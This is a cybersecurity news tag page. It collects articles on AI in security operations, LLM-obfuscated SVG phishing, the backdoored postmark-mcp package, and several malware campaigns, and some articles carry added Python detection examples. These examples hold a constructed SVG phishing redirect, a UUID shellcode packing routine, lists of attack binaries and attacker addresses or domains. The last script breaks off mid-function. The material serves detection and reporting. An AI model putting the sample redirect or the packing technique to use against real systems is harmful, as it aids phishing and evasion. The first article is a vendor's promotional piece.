Tag: Cyber Security

  • The State of AI in the SOC 2025 – Insights from Recent Study 

    The State of AI in the SOC 2025 – Insights from Recent Study 

    Security leaders are embracing AI for triage, detection engineering, and threat hunting as alert volumes and burnout hit breaking points.

    A survey of 282 security leaders, drawn primarily from US-based organizations across industries, reveals a stark reality facing modern Security Operations Centers: alert volumes have reached unsustainable levels, forcing teams to leave potentially critical alerts uninvestigated. The research shows that AI adoption in security operations has shifted from experimental to essential as teams struggle to keep pace with an ever-growing stream of alerts.

    The findings paint a picture of an industry at a tipping point, where traditional SOC models are buckling under operational pressure and AI-powered solutions are emerging as the primary path forward.

    Alert Volume Reaches Breaking Point

    Security teams are drowning in alerts, with organizations processing an average of 960 alerts per day. Large enterprises face an even more daunting reality, handling over 3,000 daily alerts from an average of 30 different alert-generating security tools.

    This volume creates a fundamental operational crisis where security teams must make difficult detection and investigation decisions under extreme time pressure. The survey reveals that alert fatigue has evolved beyond an emotional burden to become a measurable operational risk.

    Investigations Remain Slow and Manual

    The arithmetic of alert processing exposes the problem's scale. The survey found that a full investigation takes an average of 70 minutes, if someone can find the time to look at the alert at all, and that 56 minutes pass on average before anyone acts on one. At 70 minutes each, the average organization's 960 daily alerts represent roughly 1,120 analyst-hours of investigation per day, far more than any SOC staffs. That gap forces difficult choices about which alerts receive attention and which get ignored.

    The results confirm a well-known challenge within Security Operations Centers (SOCs): the volume of alerts generated daily far exceeds the capacity of human analysts to investigate them thoroughly. Compounding the problem, modern security stacks and data sources continue to grow in number and complexity, which lengthens investigation times further.

    For high-priority incidents that require immediate attention, these timeframes are unacceptable delays that can compound breach severity. For comparison, CrowdStrike's 2025 Global Threat Report puts the average eCrime breakout time, the interval between initial access and lateral movement, at 48 minutes, less than the 56 minutes that pass before an alert is even picked up.

    The Hidden Cost of Overwhelmed SOCs

    This overwhelming influx creates an impossible dilemma, forcing SOC teams to make difficult and often risky choices about which alerts receive attention and which are, by necessity, ignored. The consequence of this impossible situation is a heightened risk of missing genuine threats amidst the noise, ultimately compromising an organization’s security posture.

    40% of security alerts go completely uninvestigated due to volume and resource constraints. Even more troubling, 61% of security teams admitted to ignoring alerts that later proved to be critical security incidents.

    This statistic represents a fundamental breakdown in security operations. Teams designed to protect organizations are systematically unable to examine 40% of the potential threats they detect. The survey reveals that this isn't negligence but rather a forced adaptation to impossible workload demands.

    SOC Teams Struggle with 24/7 Operations

    The survey exposes critical gaps in round-the-clock security coverage. Many organizations lack sufficient staffing to maintain effective 24/7 SOC operations, creating vulnerability windows during off-hours when skeleton crews handle the same alert volumes that overwhelm full-strength day shifts.

    Analyst burnout has become a quantifiable problem rather than just an HR concern. Teams report that suppressing detection rules has become a default coping mechanism when alert volumes become unmanageable. This approach reduces immediate workload but potentially creates blind spots in security coverage.

    The staffing challenges are compounded by the specialized nature of security analysis work. Organizations cannot easily scale their teams to match alert volume growth, particularly given the shortage of experienced cybersecurity professionals in the current job market.


    AI transitions from experiment to strategic priority

    AI for security operations has rapidly climbed the priority ladder, now ranking as a top-three initiative alongside core security programs like cloud security and data security. This signals a fundamental shift in how security leaders view AI as a critical enabler for operational success today.

    Currently, 55% of security teams already deploy AI copilots and assistants in production to support alert triage and investigation workflows.

    The next wave of adoption is coming fast. Among teams not yet using AI, 60% plan to evaluate AI-powered SOC solutions within the year. And looking ahead, 60% of all SOC workloads are expected to be handled by AI in the next three years, according to the survey.

    Organizations seek AI for core investigative tasks

    Security teams have identified where AI can make the biggest immediate difference. Triage tops the list at 67%, followed closely by detection tuning (65%) and threat hunting (64%).

    These priorities reflect a desire to apply AI to the early stages of investigation: surfacing the alerts that matter, supplying initial context, and offloading repetitive analysis. It is not about automating away human judgment, but about accelerating workflows and sharpening human focus.

    Barriers Remain but Momentum is Clear

    Despite strong adoption intentions, security leaders identify meaningful barriers to AI implementation. Data privacy concerns, integration complexity, and explainability requirements top the list of organizational hesitations.

    The Future SOC Takes Shape

    The survey data reveals a clear trajectory toward hybrid security operations where AI handles routine analysis tasks and human analysts focus on complex investigations and strategic decision-making. This evolution promises to address both the volume problem and analyst burnout simultaneously.

    Success metrics for this transformation will likely center on operational efficiency improvements. Organizations will measure progress through reduced Mean Time to Investigation (MTTI) and Mean Time to Response (MTTR) in addition to traditional alert closure rates. Other meaningful metrics include using AI to upskill and train new SOC analysts and to shorten their ramp-up time.

    By ensuring comprehensive alert coverage through AI augmentation, organizations can reduce the risk tolerance currently forced by volume constraints. The future SOC will investigate more alerts more thoroughly while requiring less manual effort from human analysts.

    How Prophet Security Helps Customers

    Prophet Security helps organizations move beyond manual investigations and alert fatigue with an agentic AI SOC platform that automates triage, accelerates investigations, and ensures every alert gets the attention it deserves. By integrating across the existing stack, Prophet AI improves analyst efficiency, reduces incident dwell time, and delivers more consistent security outcomes. Security leaders use Prophet AI to maximize the value of their people and tools, strengthen their security posture, and turn daily SOC operations into measurable business results. Visit Prophet Security to learn more or request a demo and see how Prophet AI can elevate your SOC operations.

    This article is a contributed piece from one of The Hacker News' partners.


    Source: thehackernews.com…

  • Microsoft Flags AI-Driven Phishing: LLM-Crafted SVG Files Outsmart Email Security

    Microsoft Flags AI-Driven Phishing: LLM-Crafted SVG Files Outsmart Email Security


    Microsoft is calling attention to a new phishing campaign primarily aimed at U.S.-based organizations that has likely utilized code generated using large language models (LLMs) to obfuscate payloads and evade security defenses.

    “Appearing to be aided by a large language model (LLM), the activity obfuscated its behavior within an SVG file, leveraging business terminology and a synthetic structure to disguise its malicious intent,” the Microsoft Threat Intelligence team said in an analysis published last week.

    The activity, detected on August 28, 2025, shows how threat actors are increasingly adopting artificial intelligence (AI) tools into their workflows, often with the goal of crafting more convincing phishing lures, automating malware obfuscation, and generating code that mimics legitimate content.

    In the attack chain documented by the Windows maker, bad actors have been observed leveraging an already compromised business email account to send phishing messages designed to steal victims' credentials. The messages feature a lure masquerading as a file-sharing notification to entice recipients into opening what ostensibly appears to be a PDF document but is, in reality, a Scalable Vector Graphics (SVG) file.

    What’s notable about the messages is that the attackers make use of a self-addressed email tactic, where the sender and recipient addresses match, and the actual targets were hidden in the BCC field so as to bypass basic detection heuristics.


    “SVG files (Scalable Vector Graphics) are attractive to attackers because they are text-based and scriptable, allowing them to embed JavaScript and other dynamic content directly within the file,” Microsoft said. “This makes it possible to deliver interactive phishing payloads that appear benign to both users and many security tools.”

    On top of that, the SVG format's support for invisible elements, encoded attributes, and delayed script execution makes it well suited to adversaries looking to sidestep static analysis and sandboxing, it added.

    Once opened, the SVG redirects the user to a page that serves a CAPTCHA-style "security verification"; completing it likely leads to a fake login page that harvests credentials. Microsoft said the exact next stage is unclear because its systems flagged and neutralized the threat before it completed.
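    The self-addressed delivery trick and the scriptable-SVG payload described above both leave static signals in the message itself. The following Python is an added example, not code from Microsoft's analysis: it parses a constructed .eml (From equal to To, the real recipient present only in Delivered-To, an SVG attachment named like a PDF), flags the header pattern, content-sniffs attachments rather than trusting the filename, and lists the active-content markers (script, event handlers, CDATA, delayed execution, redirects) that Microsoft says make SVG attractive. The message, the addresses and the SVG body are all constructed; the marker list is a triage heuristic, not a verdict.

```python
import email
import re
from email import policy
from email.message import EmailMessage
from email.utils import getaddresses

# Markers that give a "static image" away as an active phishing document.
SVG_MARKERS = [
    (re.compile(r"<script\b", re.I), "inline <script>"),
    (re.compile(r"\bon(load|click|error|mouseover|begin)\s*=", re.I), "event handler attribute"),
    (re.compile(r"javascript:", re.I), "javascript: URI"),
    (re.compile(r"\bset(Timeout|Interval)\s*\(", re.I), "delayed execution"),
    (re.compile(r"<!\[CDATA\[", re.I), "CDATA section"),
    (re.compile(r"\b(atob|unescape|fromCharCode|eval)\s*\(", re.I), "decoder or eval"),
    (re.compile(r"<foreignObject\b", re.I), "foreignObject (embedded HTML)"),
    (re.compile(r"opacity\s*[:=]\s*[\"']?0\b|visibility\s*[:=]\s*[\"']?hidden|display\s*:\s*none", re.I),
     "invisible element"),
    (re.compile(r"(window\.|document\.)?location(\.href|\.replace|\.assign)?\s*[=(]|window\.open\s*\(", re.I),
     "redirect"),
]


def looks_like_svg(data: bytes) -> bool:
    """Sniff the bytes: a PDF-looking filename says nothing about the content."""
    head = data.lstrip()[:1024].lower()
    return head.startswith(b"<svg") or (head.startswith(b"<?xml") and b"<svg" in head)


def svg_findings(data: bytes) -> list[str]:
    text = data.decode("utf-8", errors="replace")
    return [label for rx, label in SVG_MARKERS if rx.search(text)]


def header_findings(msg) -> list[str]:
    """Self-addressed mail plus a delivered recipient missing from To/Cc is the
    BCC-hidden-target pattern described in the campaign."""
    senders = {a.lower() for _, a in getaddresses(msg.get_all("From", []))}
    visible = {a.lower() for _, a in getaddresses(msg.get_all("To", []) + msg.get_all("Cc", []))}
    delivered = {a.lower() for _, a in getaddresses(msg.get_all("Delivered-To", []))}
    findings = []
    if senders and senders <= visible:
        findings.append("self-addressed: From matches To")
    if delivered and not (delivered & visible):
        findings.append("delivered recipient absent from To/Cc (BCC delivery)")
    return findings


def analyze(raw: bytes) -> dict:
    msg = email.message_from_bytes(raw, policy=policy.default)
    report = {"headers": header_findings(msg), "attachments": {}}
    for part in msg.iter_attachments():
        data = part.get_payload(decode=True) or b""
        name = part.get_filename() or "<unnamed>"
        if part.get_content_type() == "image/svg+xml" or looks_like_svg(data):
            report["attachments"][name] = svg_findings(data)
    return report


def build_sample() -> bytes:
    """Constructed message modelled on the described lure. Addresses, the
    SVG body and the base64 string inside it are all made up for this example."""
    svg = """<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" width="600" height="400" onload="revenueTrend()">
  <title>Quarterly Revenue Dashboard</title>
  <rect x="10" y="10" width="580" height="380" fill="#fff"/>
  <script><![CDATA[
    function revenueTrend() {
      var quarterly = "aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvdmVyaWZ5";
      setTimeout(function () { window.location = atob(quarterly); }, 500);
    }
  ]]></script>
</svg>
"""
    msg = EmailMessage()
    msg["From"] = "finance@victim.example"
    msg["To"] = "finance@victim.example"          # sender and recipient match
    msg["Delivered-To"] = "alice@victim.example"  # the real target, reached via BCC
    msg["Subject"] = "A file has been shared with you"
    msg.set_content("Open the attached document to review the shared file.")
    msg.add_attachment(svg.encode(), maintype="image", subtype="svg+xml",
                       filename="Q3_Report.pdf.svg")
    return msg.as_bytes()


if __name__ == "__main__":
    print(analyze(build_sample()))
```

    Run against a real mailbox export, the header check needs the Delivered-To (or equivalent envelope recipient) header your MTA stamps, since the BCC address never appears in the message body; the SVG markers are worth tuning against legitimate SVGs in your environment before alerting on them.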

    But where the attack stands apart is when it comes to its unusual obfuscation approach that uses business-related language to disguise the phishing content in the SVG file — a sign that it may have been generated using an LLM.

    “First, the beginning of the SVG code was structured to look like a legitimate business analytics dashboard,” Microsoft said. “This tactic is designed to mislead anyone casually inspecting the file, making it appear as if the SVG’s sole purpose is to visualize business data. In reality, though, it’s a decoy.”

    The second aspect is that the payload’s core functionality – which is to redirect users to the initial phishing landing page, trigger browser fingerprinting, and initiate session tracking – is also obscured using a long sequence of business-related terms such as revenue, operations, risk, quarterly, growth, or shares.

    Microsoft said it ran the code against its Security Copilot, which found that the program was “not something a human would typically write from scratch due to its complexity, verbosity, and lack of practical utility.” Some of the indicators it used to arrive at the conclusion include the use of –

    • Overly descriptive and redundant naming for functions and variables
    • Highly modular and over-engineered code structure
    • Generic and verbose comments
    • Formulaic techniques to achieve obfuscation using business terminology
    • CDATA and XML declaration in the SVG file, likely in an attempt to mimic documentation examples

    “While this campaign was limited in scope and effectively blocked, similar techniques are increasingly being leveraged by a range of threat actors,” Microsoft said.

    The disclosure comes as Forcepoint detailed a multi-stage attack sequence that uses phishing emails with .XLAM attachments to execute shellcode that ultimately deploys XWorm RAT by means of a secondary payload, while simultaneously displaying a blank or corrupted Office file as a ruse. The secondary payload functions as a conduit to load a .DLL file in memory.


    “The second stage .DLL file from memory uses heavily obfuscated packing and encryption techniques,” Forcepoint said. “This second stage .DLL file loaded another .DLL file in memory again using reflective DLL injection which was further responsible for final execution of malware.”

    “The next and final step performs a process injection in its own main executable file, maintaining persistence and exfiltrating data to its command-and-control servers. The C2s to which data was exfiltrated were found to be related to the XWorm family.”

    In recent weeks, phishing attacks have also employed lures related to the U.S. Social Security Administration and copyright infringement to distribute ConnectWise ScreenConnect and information stealers such as Lone None Stealer and PureLogs Stealer, respectively, per Cofense.

    “The campaign typically spoofs various legal firms claiming to request the takedown of copyright-infringing content on the victim’s website or social media page,” the email security company said of the second set of attacks. “This campaign is notable for its novel use of a Telegram bot profile page to deliver its initial payload, obfuscated compiled Python script payloads, and evolving complexity as seen through multiple iterations of campaign samples.”


    Source: thehackernews.com…

  • First Malicious MCP Server Found Stealing Emails in Rogue Postmark-MCP Package

    First Malicious MCP Server Found Stealing Emails in Rogue Postmark-MCP Package

    Sep 29, 2025 | Ravie Lakshmanan | MCP Server / Vulnerability

    Cybersecurity researchers have discovered what has been described as the first-ever instance of a malicious Model Context Protocol (MCP) server spotted in the wild, raising software supply chain risks.

    According to Koi Security, a legitimate-looking developer managed to slip in rogue code within an npm package called “postmark-mcp” that copied an official Postmark Labs library of the same name. The malicious functionality was introduced in version 1.0.16, which was released on September 17, 2025.

    The actual “postmark-mcp” library, available on GitHub, exposes an MCP server to allow users to send emails, access and use email templates, and track campaigns using artificial intelligence (AI) assistants.


    The npm package in question has since been deleted from npm by the developer “phanpak,” who uploaded it to the repository on September 15, 2025, and maintains 31 other packages. The JavaScript library attracted a total of 1,643 downloads.

    “Since version 1.0.16, it’s been quietly copying every email to the developer’s personal server,” Koi Security Chief Technology Officer Idan Dardikman said. “This is the world’s first sighting of a real-world malicious MCP server. The attack surface for endpoint supply chain attacks is slowly becoming the enterprise’s biggest attack surface.”

    The malicious package is a replica of the original library, save for a one-line change added in version 1.0.16 that essentially forwards every email sent using the MCP server to the email address “phan@giftshop[.]club” by BCC’ing it, potentially exposing sensitive communications.

    “The postmark-mcp backdoor isn’t sophisticated – it’s embarrassingly simple,” Dardikman said. “But it perfectly demonstrates how completely broken this whole setup is. One developer. One line of code. Thousands upon thousands of stolen emails.”

    Developers who have installed the npm package are recommended to immediately remove it from their workflows, rotate any credentials that may have been exposed through email, and review email logs for BCC traffic to the reported domain.
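    One cheap control against exactly this class of backdoor is to validate every recipient of an outbound send, Bcc included, against a domain allowlist before the MCP tool hands the request to the provider, and to run the same check over historical send logs. The Python below is an added example (neither the postmark-mcp project's code nor Koi Security's tooling): the records follow the To/Cc/Bcc string fields of Postmark's send API but are constructed, the allowed domains are an assumption, and the flagged address is the one reported above.

```python
import re
from collections import defaultdict

# Assumption: the organisation's own domain plus the customer domain it is
# expected to mail. Anything else in To/Cc/Bcc is a policy violation.
ALLOWED_DOMAINS = {"corp.example", "customer.example"}

# Constructed outbound-message records (not real log data) in the shape of
# Postmark's send API: From/To/Cc/Bcc are comma-separated strings.
SAMPLE_LOG = [
    {"MessageID": "m1", "From": "billing@corp.example", "To": "alice@customer.example",
     "Bcc": "archive@corp.example", "Subject": "Invoice 1042"},
    {"MessageID": "m2", "From": "support@corp.example", "To": "bob@customer.example",
     "Bcc": "phan@giftshop.club", "Subject": "Password reset"},
    {"MessageID": "m3", "From": "support@corp.example",
     "To": "carol@customer.example, dave@customer.example", "Cc": "",
     "Bcc": "phan@giftshop.club", "Subject": "Q3 contract"},
]


def split_addrs(value: str) -> list[str]:
    """Turn 'a@x, Name <b@y>' into bare lower-case addresses."""
    out = []
    for raw in (value or "").split(","):
        raw = raw.strip()
        if not raw:
            continue
        m = re.search(r"<([^>]+)>", raw)
        out.append((m.group(1) if m else raw).strip().lower())
    return out


def domain_of(addr: str) -> str:
    return addr.rsplit("@", 1)[-1]


def check_outbound(request: dict, allowed: set[str]) -> list[str]:
    """List every recipient, in any field, whose domain is off the allowlist.
    Bcc is checked like the others: that is where the backdoor hid its address."""
    violations = []
    for field in ("To", "Cc", "Bcc"):
        for addr in split_addrs(request.get(field, "")):
            if domain_of(addr) not in allowed:
                violations.append(f"{field}: {addr}")
    return violations


def guarded_send(request: dict, allowed: set[str], send) -> dict:
    """Wrap the real provider call so an off-policy recipient aborts the send
    instead of silently leaving the building."""
    violations = check_outbound(request, allowed)
    if violations:
        raise PermissionError("blocked: " + "; ".join(violations))
    return send(request)


def review_bcc(records, allowed: set[str], min_messages: int = 2) -> dict[str, list[str]]:
    """Retrospective check over send logs: external Bcc addresses grouped by
    the messages they rode on. One address Bcc'd across unrelated messages is
    the fan-out pattern reported for postmark-mcp."""
    seen: dict[str, list[str]] = defaultdict(list)
    for rec in records:
        for addr in split_addrs(rec.get("Bcc", "")):
            if domain_of(addr) not in allowed:
                seen[addr].append(rec["MessageID"])
    return {addr: ids for addr, ids in seen.items() if len(ids) >= min_messages}


if __name__ == "__main__":
    print(review_bcc(SAMPLE_LOG, ALLOWED_DOMAINS))
```

    The guard belongs in the layer you control (the agent host or a proxy in front of the provider API), not inside the MCP server package, because the package is precisely the component that was modified; a compromised server cannot be trusted to police itself.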


    “MCP servers typically run with high trust and broad permissions inside agent toolchains. As such, any data they handle can be sensitive (password resets, invoices, customer communications, internal memos, etc.),” Snyk said. “In this case, the backdoor in this MCP Server was built with the intention to harvest and exfiltrate emails for agentic workflows that relied on this MCP Server.”

    The findings illustrate how threat actors continue to abuse the user trust associated with the open-source ecosystem and the nascent MCP ecosystem to their advantage, especially when they are rolled out in business critical environments without adequate guardrails.


    Source: thehackernews.com…

  • Researchers Expose Phishing Threats Distributing CountLoader and PureRAT

    Researchers Expose Phishing Threats Distributing CountLoader and PureRAT

    Sep 26, 2025 | Ravie Lakshmanan | Malware / Cryptocurrency


    A new campaign has been observed impersonating Ukrainian government agencies in phishing attacks to deliver CountLoader, which is then used to drop Amatera Stealer and PureMiner.

    “The phishing emails contain malicious Scalable Vector Graphics (SVG) files designed to trick recipients into opening harmful attachments,” Fortinet FortiGuard Labs researcher Yurren Wan said in a report shared with The Hacker News.

    In the attack chains documented by the cybersecurity company, the SVG files are used to initiate the download of a password-protected ZIP archive, which contains a Compiled HTML Help (CHM) file. The CHM file, when launched, activates a chain of events that culminates in the deployment of CountLoader. The email messages claim to be a notice from the National Police of Ukraine.

    CountLoader, which was the subject of a recent analysis by Silent Push, has been found to drop various payloads like Cobalt Strike, AdaptixC2, and PureHVNC RAT. In this attack chain, however, it serves as a distribution vector for Amatera Stealer, a variant of ACRStealer, and PureMiner, a stealthy .NET cryptocurrency miner.


    It’s worth pointing out that both PureHVNC RAT and PureMiner are part of a broader malware suite developed by a threat actor known as PureCoder. Some of the other products from the same author include –

    • PureCrypter, a crypter for Native and .NET
    • PureRAT (aka ResolverRAT), a successor to PureHVNC RAT
    • PureLogs, an information stealer and logger
    • BlueLoader, a malware that can act as a botnet by downloading and executing payloads remotely
    • PureClipper, a clipper malware that substitutes cryptocurrency addresses copied into the clipboard with attacker-controlled wallet addresses to redirect transactions and steal funds

    According to Fortinet, Amatera Stealer and PureMiner are both deployed as fileless threats, with the malware “executed via .NET Ahead-of-Time (AOT) compilation with process hollowing or loaded directly into memory using PythonMemoryModule.”

    Amatera Stealer, once launched, gathers system information, collects files matching a predefined list of extensions, and harvests data from Chromium- and Gecko-based browsers, as well as applications like Steam, Telegram, FileZilla, and various cryptocurrency wallets.

    “This phishing campaign demonstrates how a malicious SVG file can act as an HTML substitute to initiate an infection chain,” Fortinet said. “In this case, attackers targeted Ukrainian government entities with emails containing SVG attachments. The SVG-embedded HTML code redirected victims to a download site.”

    The development comes as Huntress uncovered a likely Vietnamese-speaking threat group using phishing emails bearing copyright infringement notice themes to trick recipients into launching ZIP archives that lead to the deployment of PXA Stealer, which then evolves into a multi-layered infection sequence dropping PureRAT.


    “This campaign demonstrates a clear and deliberate progression, starting with a simple phishing lure and escalating through layers of in-memory loaders, defense evasion, and credential theft,” security researcher James Northey said. “The final payload, PureRAT, represents the culmination of this effort: a modular, professionally developed backdoor that gives the attacker complete control over a compromised host.”

    “Their progression from amateurish obfuscation of their Python payloads to abusing commodity malware like PureRAT shows not just persistence, but also hallmarks of a serious and maturing operator.”


    Source: thehackernews.com…

  • China-Linked PlugX and Bookworm Malware Attacks Target Asian Telecom and ASEAN Networks

    China-Linked PlugX and Bookworm Malware Attacks Target Asian Telecom and ASEAN Networks

    Sep 27, 2025 | Ravie Lakshmanan | Malware / Network Security

    Telecommunications and manufacturing sectors in Central and South Asian countries have emerged as the target of an ongoing campaign distributing a new variant of a known malware called PlugX (aka Korplug or SOGU).

    “The new variant’s features overlap with both the RainyDay and Turian backdoors, including abuse of the same legitimate applications for DLL side-loading, the XOR-RC4-RtlDecompressBuffer algorithm used to encrypt/decrypt payloads and the RC4 keys used,” Cisco Talos researchers Joey Chen and Takahiro Takeda said in an analysis published this week.

    The cybersecurity company noted that the configuration associated with the PlugX variant diverges significantly from the usual PlugX configuration format, instead adopting the same structure used in RainyDay, a backdoor associated with a China-linked threat actor known as Lotus Panda (aka Naikon APT). It’s also likely tracked by Kaspersky as FoundCore and attributed to a Chinese-speaking threat group it calls Cycldek.


    PlugX is a modular remote access trojan (RAT) widely used by many China-aligned hacking groups, but most prominently by Mustang Panda (aka BASIN, Bronze President, Camaro Dragon, Earth Preta, HoneyMyte, RedDelta, Red Lich, Stately Taurus, TEMP.Hex, and Twill Typhoon).

    Turian (aka Quarian or Whitebird), on the other hand, is assessed to be a backdoor exclusively employed in cyber attacks targeting the Middle East by another advanced persistent threat (APT) group with ties to China referred to as BackdoorDiplomacy (aka CloudComputating or Faking Dragon).

    The victimology patterns, particularly the focus on telecommunications companies, and the technical implementation of the malware have yielded evidence suggesting likely connections between Lotus Panda and BackdoorDiplomacy, raising the possibility that either the two clusters are one and the same, or that they obtain their tools from a common vendor.

    In one incident detected by the company, Naikon is said to have targeted a telecom firm in Kazakhstan, a country that shares its borders with Uzbekistan, which has been previously singled out by BackdoorDiplomacy. What’s more, both hacking crews have been found to zero in on South Asian countries.

    The attack chains essentially involve abusing a legitimate executable associated with Mobile Popup Application to sideload a malicious DLL that’s then used to decrypt and launch PlugX, RainyDay, and Turian payloads in memory. Recent attack waves orchestrated by the threat actor have heavily leaned on PlugX, which uses the same configuration structure as RainyDay and includes an embedded keylogger plugin.

    “While we cannot conclude that there is a clear connection between Naikon and BackdoorDiplomacy, there are significant overlapping aspects – such as the choice of targets, encryption/decryption payload methods, encryption key reuse and use of tools supported by the same vendor,” Talos said. “These similarities suggest a medium confidence link to a Chinese-speaking actor in this campaign.”

    Mustang Panda’s Bookworm Malware Detailed

    The disclosure comes as Palo Alto Networks Unit 42 sheds light on the inner workings of the Bookworm malware used by the Mustang Panda actor since 2015 to gain extensive control over compromised systems. The advanced RAT comes fitted with capabilities to execute arbitrary commands, upload/download files, exfiltrate data, and establish persistent access.

    Earlier this March, the cybersecurity vendor said it identified attacks targeting countries affiliated with the Association of Southeast Asian Nations (ASEAN) to distribute the malware.


    Bookworm uses legitimate-looking domains or compromised infrastructure for C2 so as to blend in with normal network traffic. Select variants of the malware have also been found to share overlaps with TONESHELL, a known backdoor associated with Mustang Panda since late 2022.

    Like PlugX and TONESHELL, attack chains distributing Bookworm rely on DLL side-loading for payload execution, although newer variants have embraced a technique that involves packaging shellcode as universally unique identifier (UUID) strings, which are then decoded and executed.
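    Decoding the UUID-packed shellcode mentioned above is mostly a byte-order problem: a loader that feeds each string to UuidFromStringA gets the struct layout back (Data1, Data2 and Data3 little-endian), so a decoder must reassemble with that layout rather than the RFC 4122 network order a UUID library returns by default. The Python below is an added example, not Unit 42's tooling or Bookworm's own code; the "shellcode" is a constructed placeholder, the C-style array it is embedded in is constructed too, and the eight-UUID threshold for the carving heuristic is an assumption.

```python
import re
import uuid

UUID_RE = re.compile(r"[0-9a-fA-F]{8}-(?:[0-9a-fA-F]{4}-){3}[0-9a-fA-F]{12}")

# Constructed placeholder standing in for the shellcode blob: three NOPs and a
# repeated text marker. Not real shellcode.
SAMPLE_BLOB = b"\x90\x90\x90" + b"constructed placeholder, not real shellcode. " * 4


def encode_as_uuids(blob: bytes) -> list[str]:
    """Pack bytes into 16-byte UUID strings using the in-memory layout that
    UuidFromStringA writes (little-endian Data1/Data2/Data3), which is what
    a loader that walks the array and calls that API ends up with."""
    padded = blob + b"\x00" * (-len(blob) % 16)
    return [str(uuid.UUID(bytes_le=padded[i:i + 16])) for i in range(0, len(padded), 16)]


def decode_uuids(strings, native_layout: bool = True) -> bytes:
    """Rebuild the bytes. native_layout=True mirrors what the loader gets in
    memory; False uses RFC 4122 network order and scrambles the first eight
    bytes of every chunk, the usual mistake when decoding these samples by hand."""
    return b"".join(uuid.UUID(s).bytes_le if native_layout else uuid.UUID(s).bytes
                    for s in strings)


def carve_uuid_payload(text: str, min_count: int = 8) -> tuple[int, bytes]:
    """Scan source or strings output for a run of UUIDs and decode it. Fewer
    than min_count (assumed threshold) is treated as ordinary GUID usage."""
    found = UUID_RE.findall(text)
    if len(found) < min_count:
        return len(found), b""
    return len(found), decode_uuids(found)


def build_sample_source() -> str:
    """Constructed C-style array literal of the kind such a loader carries."""
    items = ",\n    ".join(f'"{u}"' for u in encode_as_uuids(SAMPLE_BLOB))
    return "const char* uuids[] = {\n    " + items + "\n};\n"


if __name__ == "__main__":
    count, blob = carve_uuid_payload(build_sample_source())
    print(count, blob[:16])
```

    When you carve a real sample, check the first bytes of the decoded blob for a plausible prologue before trusting the layout: if the two decodings disagree only in each 16-byte chunk's first eight bytes, you have the byte-order wrong, not the data.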

    “Bookworm is known for its unique modular architecture, allowing its core functionality to be expanded by loading additional modules directly from its command-and-control (C2) server,” Unit 42 researcher Kyle Wilhoit said. “This modularity makes static analysis more challenging, as the Leader module relies on other DLLs to provide specific functionality.”

    “This deployment and adaptation of Bookworm, running in parallel with other Stately Taurus operations, showcases its long-term role in the actor’s arsenal. It also points to a sustained, long-term commitment to its development and use by the group.”


    Source: thehackernews.com…


  • New COLDRIVER Malware Campaign Joins BO Team and Bearlyfy in Russia-Focused Cyberattacks

    New COLDRIVER Malware Campaign Joins BO Team and Bearlyfy in Russia-Focused Cyberattacks

    The Russian advanced persistent threat (APT) group known as COLDRIVER has been attributed to a fresh round of ClickFix-style attacks designed to deliver two new “lightweight” malware families tracked as BAITSWITCH and SIMPLEFIX.

    Zscaler ThreatLabz, which detected the new multi-stage ClickFix campaign earlier this month, described BAITSWITCH as a downloader that ultimately drops SIMPLEFIX, a PowerShell backdoor.

    COLDRIVER, also tracked as Callisto, Star Blizzard, and UNC4057, is the moniker assigned to a Russia-linked threat actor that’s known to target a wide range of sectors since 2019. While early campaign waves were observed using spear-phishing lures to direct targets to credential harvesting pages, the group has been fleshing out its arsenal with custom tools like SPICA and LOSTKEYS, which underscores its technical sophistication.

    The adversary’s use of ClickFix tactics was previously documented by the Google Threat Intelligence Group (GTIG) back in May 2025, using fake sites serving fake CAPTCHA verification prompts to trick the victim into executing a PowerShell command that’s designed to deliver the LOSTKEYS Visual Basic Script.


    “The continued use of ClickFix suggests that it is an effective infection vector, even if it is neither novel nor technically advanced,” Zscaler security researchers Sudeep Singh and Yin Hong Chang said in a report published this week.

    The latest attack chain follows the same modus operandi, tricking unsuspecting users into running a malicious DLL via the Windows Run dialog under the guise of completing a CAPTCHA check. The DLL, BAITSWITCH, reaches out to an attacker-controlled domain (“captchanom[.]top”) to fetch the SIMPLEFIX backdoor, while a decoy document hosted on Google Drive is displayed to the victim.

    It also makes several HTTP requests to the same server to send system information, receive commands to establish persistence, store encrypted payloads in the Windows Registry, download a PowerShell stager, and clear the most recent command executed in the Run dialog, effectively erasing traces of the ClickFix lure that triggered the infection.
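    The chain above leaves two telemetry artifacts a defender can look for: a LOLBin started by explorer.exe (the parent of anything launched from the Win+R dialog) with a remote reference on its command line, and a deletion of a RunMRU value, the registry key where Windows keeps Run-dialog history. The following Python is an added example of that triage logic, not Zscaler’s tooling or the article’s code; the Sysmon-shaped events are constructed, and the only indicator taken from the report is the captchanom[.]top domain.

```python
"""Heuristic ClickFix triage over Sysmon-style process and registry events.

Added example, not code from Zscaler or the original article. The events
below are constructed for illustration; field names follow Sysmon Event ID 1
(process creation) and Event ID 12 (registry object delete), and the only
indicator taken from the report is the BAITSWITCH domain.
"""
import re

KNOWN_C2 = "captchanom.top"  # from the report, undefanged

# Binaries a ClickFix lure typically asks the victim to type into Win+R.
RUN_DIALOG_LOLBINS = {
    "rundll32.exe", "mshta.exe", "powershell.exe", "pwsh.exe",
    "cmd.exe", "regsvr32.exe", "msiexec.exe", "curl.exe", "certutil.exe",
}

# A URL, a UNC path (\\host\share) or a bare hostname in the command line.
REMOTE_REF = re.compile(
    r"https?://|\\\\[\w.-]+\\|\b[\w-]+\.(?:top|xyz|com|net|org|io)\b", re.I
)


def _base(path):
    """Lower-cased file name of a Windows path (empty string if missing)."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return (event_id, reason) tuples for events that look like ClickFix."""
    findings = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 1:
            # Win+R launches its target with explorer.exe as the parent.
            parent_ok = _base(ev.get("ParentImage", "")) == "explorer.exe"
            child = _base(ev.get("Image", ""))
            cmd = ev.get("CommandLine", "").replace("[.]", ".")
            if parent_ok and child in RUN_DIALOG_LOLBINS and REMOTE_REF.search(cmd):
                reason = f"{child} launched from the Run dialog with a remote reference"
                if KNOWN_C2 in cmd.lower():
                    reason += f"; command line contains known BAITSWITCH C2 {KNOWN_C2}"
                findings.append((1, reason))
        elif eid == 12 and ev.get("EventType") == "DeleteValue":
            # RunMRU holds the Run-dialog history; BAITSWITCH deletes the
            # most recent entry to hide what the victim typed.
            if "\\explorer\\runmru\\" in ev.get("TargetObject", "").lower():
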